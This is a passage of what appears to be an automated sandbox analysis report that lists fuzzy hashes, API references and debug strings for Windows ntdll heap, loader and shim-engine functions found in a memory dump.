                                                                                                                          • Instruction ID: bb43704af67f4534bb99cab92b8ab0f3a9a236323ea29d4e3e653058ed3bad6c
                                                                                                                          • Opcode Fuzzy Hash: 26982e91f3027784a1974d71ac6240fe61a758aa084a9108eb4bc8d7d014df61
                                                                                                                          • Instruction Fuzzy Hash: C6F1CB70A00642DFDB05CF69D890B6AB7F6FF44300F208AA8E5469B381D774ED81CB98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3446177414-0
                                                                                                                          • Opcode ID: 6051c57a3f19ef26ce20092e4d32ce6ccda2c1321118ade67225147b90f190d0
                                                                                                                          • Instruction ID: e592507e03efc0ed7b54317f551f616bf0bf139958c6939dda085deec9d402fc
                                                                                                                          • Opcode Fuzzy Hash: 6051c57a3f19ef26ce20092e4d32ce6ccda2c1321118ade67225147b90f190d0
                                                                                                                          • Instruction Fuzzy Hash: 76F10772E006618FCB18CFA9C9A067DFBF6AF8820071A466DD457DB384D635EE41CB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: HEAP:
                                                                                                                          • API String ID: 3446177414-2466845122
                                                                                                                          • Opcode ID: 7712881d8c7e6b1db928f732716c6a27489ca20c29022b89bc9b0ec988550444
                                                                                                                          • Instruction ID: 7c27adf60e55486e8ded48502bf165d27e3770da11b7d71111cf8f84d9fa5ae2
                                                                                                                          • Opcode Fuzzy Hash: 7712881d8c7e6b1db928f732716c6a27489ca20c29022b89bc9b0ec988550444
                                                                                                                          • Instruction Fuzzy Hash: ADA1A075A143228FD704CF28C8A4A2AB7E6FF88710F15466DE946DB321E730EC42CB95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 1EA64592
                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1EA64530
                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1EA64507
                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1EA64460
                                                                                                                          • ExecuteOptions, xrefs: 1EA644AB
                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1EA6454D
                                                                                                                          • Execute=1, xrefs: 1EA6451E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                          • API String ID: 0-484625025
                                                                                                                          • Opcode ID: 88e6b7b622fbd5cc2c93ac449ea040cc3f5e104d1b209b87aa48f5f74668f169
                                                                                                                          • Instruction ID: 22dce5c519eb246d086d81084f2d29af96bfd13bec3121125f39b59331df13b9
                                                                                                                          • Opcode Fuzzy Hash: 88e6b7b622fbd5cc2c93ac449ea040cc3f5e104d1b209b87aa48f5f74668f169
                                                                                                                          • Instruction Fuzzy Hash: 37512971A0025A6ADB109BA5DD95FAD77A9BF08304F500BF9F505B7180D730AF45CF58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1EA57807
                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1EA577E2
                                                                                                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1EA578F3
                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 1EA577DD, 1EA57802
                                                                                                                          • SsHd, xrefs: 1EA0A304
                                                                                                                          • Actx , xrefs: 1EA57819, 1EA57880
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                          • API String ID: 0-1988757188
                                                                                                                          • Opcode ID: 5d78ac92fa47c026b3da4a56916d03a1b27242d570caa47fbf90e478e011f532
                                                                                                                          • Instruction ID: ecc5e163bbbad7c6ff5bdd8431571a4221ec423896015408d5c4a5e2a6ecc59f
                                                                                                                          • Opcode Fuzzy Hash: 5d78ac92fa47c026b3da4a56916d03a1b27242d570caa47fbf90e478e011f532
                                                                                                                          • Instruction Fuzzy Hash: C8E1AF74A043428FD715CE25E8A4B5A7BE2BF89324F104B2DF8659B390D731EC85CB96
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1EA59178
                                                                                                                          • GsHd, xrefs: 1EA0D794
                                                                                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1EA59372
                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1EA59153
                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 1EA5914E, 1EA59173
                                                                                                                          • Actx , xrefs: 1EA59315
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                          • API String ID: 3446177414-2196497285
                                                                                                                          • Opcode ID: f997799eef0f0ae595c7531e98fe757abc02d42b40ed6d5146bd588b3102938a
                                                                                                                          • Instruction ID: 5040935259cf31a68863bab70e1293599569207e90ded3fc4c6945dee55a50bb
                                                                                                                          • Opcode Fuzzy Hash: f997799eef0f0ae595c7531e98fe757abc02d42b40ed6d5146bd588b3102938a
                                                                                                                          • Instruction Fuzzy Hash: 7BE19F71604342CFD710CF29D880B5ABBE6BF89314F144B6DE9A58B381D771E948CB9A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                          • API String ID: 3446177414-1745908468
                                                                                                                          • Opcode ID: 97143fd49e718d032f4d7a4dbe9e9f83c5758c9ed3aa95c5c353501c10cf9225
                                                                                                                          • Instruction ID: c2edf468c01b9f55ba9c1f7b91e035f54797fcbf55a026acc32f7d90dc6feeb7
                                                                                                                          • Opcode Fuzzy Hash: 97143fd49e718d032f4d7a4dbe9e9f83c5758c9ed3aa95c5c353501c10cf9225
                                                                                                                          • Instruction Fuzzy Hash: 74912139900685DFCB02CFA8C440AAEBBFAFF89310F14865DE551AB751C735A981EB58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 1E9E651C
                                                                                                                            • Part of subcall function 1E9E6565: RtlDebugPrintTimes.NTDLL ref: 1E9E6614
                                                                                                                            • Part of subcall function 1E9E6565: RtlDebugPrintTimes.NTDLL ref: 1E9E665F
                                                                                                                          Strings
                                                                                                                          • LdrpInitShimEngine, xrefs: 1EA49783, 1EA49796, 1EA497BF
                                                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1EA4977C
                                                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1EA49790
                                                                                                                          • apphelp.dll, xrefs: 1E9E6446
                                                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1EA497B9
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1EA497A0, 1EA497C9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 3446177414-204845295
                                                                                                                          • Opcode ID: 748d9bd65d840b03f497ce1e604976ec0c80ecce226a5fdc9cffa52200b21b69
                                                                                                                          • Instruction ID: 70bf2900e9e7f11e5f43e2a723f0e045f303298e82f930b16955e197c9d008bc
                                                                                                                          • Opcode Fuzzy Hash: 748d9bd65d840b03f497ce1e604976ec0c80ecce226a5fdc9cffa52200b21b69
                                                                                                                          • Instruction Fuzzy Hash: 3A51C0752083529FD311CF24C890BAB77E4FF84614F184B5DF6859B651EB30EA05CB96
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                          • API String ID: 3446177414-4227709934
                                                                                                                          • Opcode ID: 2c9a5b4a1de290a18a8eee50a072a97ae977a1edf6b81c8044e348a3f100c77a
                                                                                                                          • Instruction ID: 91205c61b8bf3ce50f900d0018d2564ad252b5ada37b82d0193cab696b1a3922
                                                                                                                          • Opcode Fuzzy Hash: 2c9a5b4a1de290a18a8eee50a072a97ae977a1edf6b81c8044e348a3f100c77a
                                                                                                                          • Instruction Fuzzy Hash: A1417FB9A00219AFCB01CF99C990AEEBBBAFF49354F544269E904B7340D7319E41DB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                          • API String ID: 3446177414-3492000579
                                                                                                                          • Opcode ID: 66a3d225aeac7d2dc8d6bd73a3ea4950a7d5fbd63786c8bf3ff994ce82ebb0b9
                                                                                                                          • Instruction ID: 2446381c687bbd169ff2f434b8b2fb8bf4790d708ddb602405ecb3c590291a89
                                                                                                                          • Opcode Fuzzy Hash: 66a3d225aeac7d2dc8d6bd73a3ea4950a7d5fbd63786c8bf3ff994ce82ebb0b9
                                                                                                                          • Instruction Fuzzy Hash: D371F0399006859FCB02CFA8C4A06BDFBFAFF89304F148659E445AB751C731AD81DB98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • LdrpLoadShimEngine, xrefs: 1EA4984A, 1EA4988B
                                                                                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1EA49843
                                                                                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1EA49885
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1EA49854, 1EA49895
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 3446177414-3589223738
                                                                                                                          • Opcode ID: ef6902c12dbd6c028c99a9d4b3bbd897f045f14f28fa3dfd1065e1ad9a8f7af3
                                                                                                                          • Instruction ID: 43c3f0f06504e39a4d96983fd8dc6e34ee4f10332b8f5a2d5546f4f95ae36549
                                                                                                                          • Opcode Fuzzy Hash: ef6902c12dbd6c028c99a9d4b3bbd897f045f14f28fa3dfd1065e1ad9a8f7af3
                                                                                                                          • Instruction Fuzzy Hash: 27514675A103A59FCB05CBACCC94AED77B6BB84710F180769E641BF286DB70AC05CB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 1EA1D879
                                                                                                                            • Part of subcall function 1E9F4779: RtlDebugPrintTimes.NTDLL ref: 1E9F4817
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 3446177414-1975516107
                                                                                                                          • Opcode ID: 2f9160ebc28fa975357bb940dfc885d0bcacfea42de34f90e2052110b0537ffc
                                                                                                                          • Instruction ID: 3480dd476f545fc1954f026fa6cffed38a1e6397e0b4ec6002a5fee6c6df3227
                                                                                                                          • Opcode Fuzzy Hash: 2f9160ebc28fa975357bb940dfc885d0bcacfea42de34f90e2052110b0537ffc
                                                                                                                          • Instruction Fuzzy Hash: D151E17AE043969FDB04DFA8C58479EBBB2BF84314F244659D4007F281E774A986CBC8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                          • API String ID: 3446177414-3224558752
                                                                                                                          • Opcode ID: 84258e29c589617eab6ede0b1c44a1610a7c5a9abedde747ac5e1fca48c6b344
                                                                                                                          • Instruction ID: 19c8b4c9aca76893682215a5c06f2b8b2f77736cede956a7e055f717f0bec030
                                                                                                                          • Opcode Fuzzy Hash: 84258e29c589617eab6ede0b1c44a1610a7c5a9abedde747ac5e1fca48c6b344
                                                                                                                          • Instruction Fuzzy Hash: 4A413839914681DFC721DF24C594B69B3B9FF41324F148B69E4065B781C738AD80CB99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • HEAP: , xrefs: 1EA9ECDD
                                                                                                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1EA9EDE3
                                                                                                                          • Entry Heap Size , xrefs: 1EA9EDED
                                                                                                                          • ---------------------------------------, xrefs: 1EA9EDF9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                          • API String ID: 3446177414-1102453626
                                                                                                                          • Opcode ID: 82af461a229d8effc575459a6618064452ff0106b8d2b178b7d84bded182c68f
                                                                                                                          • Instruction ID: ae574d3e3899a891d76522cfdb7551877926d38a124da9960a99d05aaec4ca56
                                                                                                                          • Opcode Fuzzy Hash: 82af461a229d8effc575459a6618064452ff0106b8d2b178b7d84bded182c68f
                                                                                                                          • Instruction Fuzzy Hash: EC419D35A00626DFC705CF19C48495ABBEAFF49314B26C6ADE608AF712D731EC42DB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                          • API String ID: 3446177414-1222099010
                                                                                                                          • Opcode ID: 1efba5d9c710823f48f5d9b0372f3bbeaa48fa2acfc901216436ac7d9d639f9b
                                                                                                                          • Instruction ID: 6dcd125013c4d7887984d7d934d36b1570cdc5c619167457ad277388f792d90d
                                                                                                                          • Opcode Fuzzy Hash: 1efba5d9c710823f48f5d9b0372f3bbeaa48fa2acfc901216436ac7d9d639f9b
                                                                                                                          • Instruction Fuzzy Hash: 093121395146C49FD722EB28C818B9977ADEF41624F004B89E4034BB91C779BD80CBAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: $$@
                                                                                                                          • API String ID: 3446177414-1194432280
                                                                                                                          • Opcode ID: 84e420a1a60780436c275aa063d08345a82871f60a553e03ef52ac99b63138e7
                                                                                                                          • Instruction ID: b7cb2ce0d9d5228c33feeb0a8fccd88e7a02f6157be30456989a541a49a3b954
                                                                                                                          • Opcode Fuzzy Hash: 84e420a1a60780436c275aa063d08345a82871f60a553e03ef52ac99b63138e7
                                                                                                                          • Instruction Fuzzy Hash: 7F812BB1D00269DBDB21CF94CD44BEEB6B8AF48714F0446EAE909B7240D7709E85CFA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 1EA63466
                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 1EA6344A, 1EA63476
                                                                                                                          • LdrpFindDllActivationContext, xrefs: 1EA63440, 1EA6346C
                                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1EA63439
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                          • API String ID: 3446177414-3779518884
                                                                                                                          • Opcode ID: c1aa2d303c93b73f8687bb095e586cf44436bd898b80068759445b6ae54fda3a
                                                                                                                          • Instruction ID: f09ad54f7714df643571ff042404c42e0ee503505ae7630405753824bce43cee
                                                                                                                          • Opcode Fuzzy Hash: c1aa2d303c93b73f8687bb095e586cf44436bd898b80068759445b6ae54fda3a
                                                                                                                          • Instruction Fuzzy Hash: A9310972E003A3AFD711EB0DC894B65BAB6FB45754F82C37AD5017B250D7609C80C799
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1EA5A79F
                                                                                                                          • apphelp.dll, xrefs: 1EA12382
                                                                                                                          • LdrpDynamicShimModule, xrefs: 1EA5A7A5
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1EA5A7AF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 0-176724104
                                                                                                                          • Opcode ID: b270a9238801003effba3a3ec42bfcd40f2c6005311deedf64845f4667e33a57
                                                                                                                          • Instruction ID: 6acc59803fb438b1d8a8a30e5f497692ab0d3d6e7c87e4b27a94052bdd9c196c
                                                                                                                          • Opcode Fuzzy Hash: b270a9238801003effba3a3ec42bfcd40f2c6005311deedf64845f4667e33a57
                                                                                                                          • Instruction Fuzzy Hash: 7D31E376A00361EBD7109F59C8E0AAA77B6FFC4B10F24465DE911AB340E770AD46CB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
